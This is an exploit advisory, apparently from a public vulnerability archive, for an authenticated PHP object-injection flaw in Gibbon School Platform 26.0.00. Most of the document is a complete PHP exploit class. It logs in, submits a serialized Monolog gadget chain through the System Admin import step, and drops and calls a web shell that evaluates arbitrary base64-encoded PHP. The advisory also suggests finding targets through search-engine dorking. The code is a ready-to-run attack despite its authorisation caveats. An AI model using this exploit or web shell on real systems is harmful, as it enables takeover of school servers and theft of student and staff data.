Gibbon School Platform 26.0.00 Code Injection

=============================================================================================================================================
| # Title : Gibbon School Platform 26.0.00 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://gibbonedu.org/ |
=============================================================================================================================================

POC :

[+] Find exposed Gibbon instances via Google dorking or another search engine — test only systems you are authorised to assess.

[+] Uses PHP cURL to log in, post the serialized payload to the import step, and then fetch the dropped web shell — i.e. remote command execution through an authenticated account.

[+] Set the target URL and valid credentials in the "// Usage" block at the bottom of the script (the `new GibbonExploit(...)` call); the exploit is authenticated and does nothing without a working login.

[+] Save the code below as poc.php.

[+] Usage (Windows cmd, from the folder holding the script, e.g. c:\www\test): php poc.php

[+] Payload:

<?php

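/**
 * Proof-of-concept client for the authenticated PHP object-injection flaw in the
 * Gibbon 26.0.00 "External Assessment" import flow (System Admin > Import).
 *
 * Flow:  1. gibbon_login()    -- obtain a session with valid credentials;
 *        2. upload_webshell() -- POST a serialized Monolog object graph as the
 *                                `columnOrder` field of import step 4, which the
 *                                server evidently deserialises;
 *        3. execute_php()     -- GET the file the gadget chain wrote, which runs
 *                                the supplied PHP.
 *
 * The import is a privileged action; the account used presumably needs System
 * Admin rights -- confirm on the target.  Only run this against systems you are
 * authorised to test.
 *
 * Review notes on the listing this replaces: the original created a fresh cURL
 * handle per request with no cookie jar, so the session obtained by the login
 * was never sent with the import request; and it wrote the serialized payload
 * in a single-quoted string, where `\x00` is four literal characters rather
 * than a NUL byte, so every protected-property name had the wrong length and
 * the payload could not deserialise.  Both are fixed below.
 */
class GibbonExploit
{
    /** @var string Base URL of the target without a trailing slash, e.g. https://host */
    private $target_uri;
    /** @var string */
    private $username;
    /** @var string */
    private $password;
    /** @var string File the gadget writes (relative to the web server's cwd) and that is fetched under target_uri */
    private $webshell_name;
    /** @var string|null cURL cookie-jar path, created lazily on the first request */
    private $cookie_jar = null;
    /** @var int HTTP status of the most recent request (0 before any request) */
    private $last_http_code = 0;

    /**
     * @param string      $target_uri    Base URL of the Gibbon install (no trailing slash).
     * @param string      $username      Login name of an account that may run imports.
     * @param string      $password      Its password.
     * @param string|null $webshell_name Name of the dropped file; a random `*.php` when null or empty.
     */
    public function __construct(string $target_uri, string $username, string $password, ?string $webshell_name = null)
    {
        $this->target_uri = $target_uri;
        $this->username = $username;
        $this->password = $password;
        // A falsy name (null or '') falls back to a random one so repeated runs do not collide.
        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';
    }

    /**
     * Remove the cookie jar created for this session, if any.
     */
    public function __destruct()
    {
        if ($this->cookie_jar !== null && is_file($this->cookie_jar)) {
            unlink($this->cookie_jar);
        }
    }

    /**
     * Perform one HTTP request and return the body.
     *
     * Cookies are persisted in a per-instance jar so the session obtained by
     * gibbon_login() is replayed on the import request.  TLS verification is
     * deliberately disabled (lab targets usually have self-signed certs); this
     * exposes the credentials to interception on a hostile network.
     *
     * @param string      $method  HTTP verb.
     * @param string      $url     Absolute URL.
     * @param string|null $data    URL-encoded body, or null/'' for none.
     * @param string[]    $headers Extra request headers.
     * @return string Response body.
     * @throws RuntimeException on a transport-level failure (DNS, connect, TLS, timeout).
     */
    private function send_request(string $method, string $url, ?string $data = null, array $headers = []): string
    {
        $jar = $this->cookie_jar_path();

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data !== null && $data !== '') {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $jar);
        curl_setopt($ch, CURLOPT_COOKIEJAR, $jar);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
        curl_setopt($ch, CURLOPT_TIMEOUT, 60);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }

        $response = curl_exec($ch);
        $error = curl_error($ch);
        $this->last_http_code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($response === false) {
            throw new RuntimeException(sprintf('%s %s failed: %s', $method, $url, $error));
        }

        return $response;
    }

    /**
     * Authenticate and store the resulting session cookie in the jar.
     *
     * The school-year and language IDs are hard-coded and instance specific;
     * confirm them against the target's login form if the import later fails.
     * The response is not inspected: a wrong password still returns a page.
     *
     * @return string Raw response body of the login POST.
     * @throws RuntimeException on a transport-level failure.
     */
    public function gibbon_login(): string
    {
        $login_url = $this->target_uri . '/login.php?timeout=true';
        $data = [
            'address' => '',
            'method' => 'default',
            'username' => $this->username,
            'password' => $this->password,
            'gibbonSchoolYearID' => '025',
            'gibboni18nID' => '0002',
        ];

        return $this->send_request('POST', $login_url, http_build_query($data));
    }

    /**
     * Build the step-4 import form with the gadget chain in `columnOrder`.
     *
     * The chain is the well-known Monolog one: a SyslogUdpHandler whose
     * `socket` is a BufferHandler carrying one buffered record (the shell
     * command) and the processors `current` then `system`.  The duplicate
     * `i:7` key overwrites the object while the array is being deserialised,
     * which is the usual trick to fire its destructor immediately -- verify
     * against the Monolog version bundled with the target.  Protected property
     * names are serialised as "\0*\0name", so the NULs must be real bytes.
     *
     * NOTE(review): `fieldDelimiter`/`stringEnclosure` are given pre-encoded
     * and then encoded again by http_build_query (`%2C` -> `%252C`); kept as in
     * the original because it is unclear which form the server expects.
     *
     * @param string $payload Shell command executed by system() on the target.
     * @return array<string, string> Form fields for http_build_query().
     */
    private function construct_form_data(string $payload): array
    {
        // Serialized strings are length-prefixed in bytes, so strlen (not mb_strlen) is correct here.
        $payload_len = strlen($payload);
        $prot = "\0*\0"; // prefix of a serialised protected property name

        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{'
            . 's:9:"' . $prot . 'socket";O:29:"Monolog\\Handler\\BufferHandler":7:{'
            . 's:10:"' . $prot . 'handler";r:3;'
            . 's:13:"' . $prot . 'bufferSize";i:-1;'
            . 's:9:"' . $prot . 'buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}'
            . 's:8:"' . $prot . 'level";N;'
            . 's:14:"' . $prot . 'initialized";b:1;'
            . 's:14:"' . $prot . 'bufferLimit";i:-1;'
            . 's:13:"' . $prot . 'processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}'
            . '}}i:7;i:7;}';

        return [
            'address' => '/modules/System Admin/import_run.php',
            'mode' => 'sync',
            'syncField' => 'N',
            'syncColumn' => '',
            'columnOrder' => $payload_data,
            'columnText' => 'N;',
            'fieldDelimiter' => '%2C',
            'stringEnclosure' => '%22',
            'filename' => $this->randomString() . '.xlsx',
            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',
            'ignoreErrors' => '1',
            'Failed' => 'Submit',
        ];
    }

    /**
     * Submit the import that makes the target write the web shell.
     *
     * The command run by the gadget echoes a one-line PHP file into the web
     * server's current directory, which the later GET assumes is the web root.
     *
     * @param string $b64_payload Base64 of the PHP code the shell should eval().
     * @return string Raw response body of the import POST (not a success indicator).
     * @throws RuntimeException on a transport-level failure.
     */
    public function upload_webshell(string $b64_payload): string
    {
        $php_payload = sprintf(
            'echo "<?php @eval(base64_decode(\'%s\'));?>" > %s',
            $b64_payload,
            $this->webshell_name
        );
        $form_data = $this->construct_form_data($php_payload);

        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';
        return $this->send_request('POST', $url, http_build_query($form_data));
    }

    /**
     * Drop the web shell carrying $cmd and fetch it once.
     *
     * @param string $cmd PHP code to run on the target, e.g. 'phpinfo();'.
     * @return string Output produced by the web shell.
     * @throws RuntimeException on a transport failure, or when the shell URL
     *                          answers with an HTTP error (gadget did not fire,
     *                          or the file landed outside the web root).
     */
    public function execute_php(string $cmd): string
    {
        $this->upload_webshell(base64_encode($cmd));

        // The import response does not reliably say whether the gadget fired;
        // fetching the dropped file is the real check.
        $body = $this->send_request('GET', $this->target_uri . '/' . $this->webshell_name);
        if ($this->last_http_code >= 400) {
            throw new RuntimeException(sprintf(
                'Web shell %s not reachable (HTTP %d): the gadget may not have fired, or the file landed outside the web root.',
                $this->webshell_name,
                $this->last_http_code
            ));
        }

        return $body;
    }

    /**
     * Random ASCII-letter string, used for the dropped file names.
     * random_int() rather than str_shuffle so the name is not guessable.
     *
     * @param int $length Number of characters.
     */
    private function randomString(int $length = 10): string
    {
        $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $max = strlen($alphabet) - 1;
        $out = '';
        for ($i = 0; $i < $length; $i++) {
            $out .= $alphabet[random_int(0, $max)];
        }
        return $out;
    }

    /**
     * Path of this instance's cookie jar, created on first use.
     *
     * @throws RuntimeException when no temp file can be created.
     */
    private function cookie_jar_path(): string
    {
        if ($this->cookie_jar === null) {
            $jar = tempnam(sys_get_temp_dir(), 'gibbon_poc_');
            if ($jar === false) {
                throw new RuntimeException('Could not create a cookie jar in ' . sys_get_temp_dir());
            }
            $this->cookie_jar = $jar;
        }
        return $this->cookie_jar;
    }
}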

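// Usage -- only against a Gibbon 26.0.00 install you are authorised to test.
// Replace the base URL (no trailing slash) and the credentials; the account
// must be able to run the System Admin import, presumably an administrator.
$exploit = new GibbonExploit('https://target-site.com', 'admin@example.com', 'password');
$exploit->gibbon_login();
// Any PHP statement: it is base64-encoded into the dropped shell and eval()'d there.
$response = $exploit->execute_php('phpinfo();');
echo $response;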

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
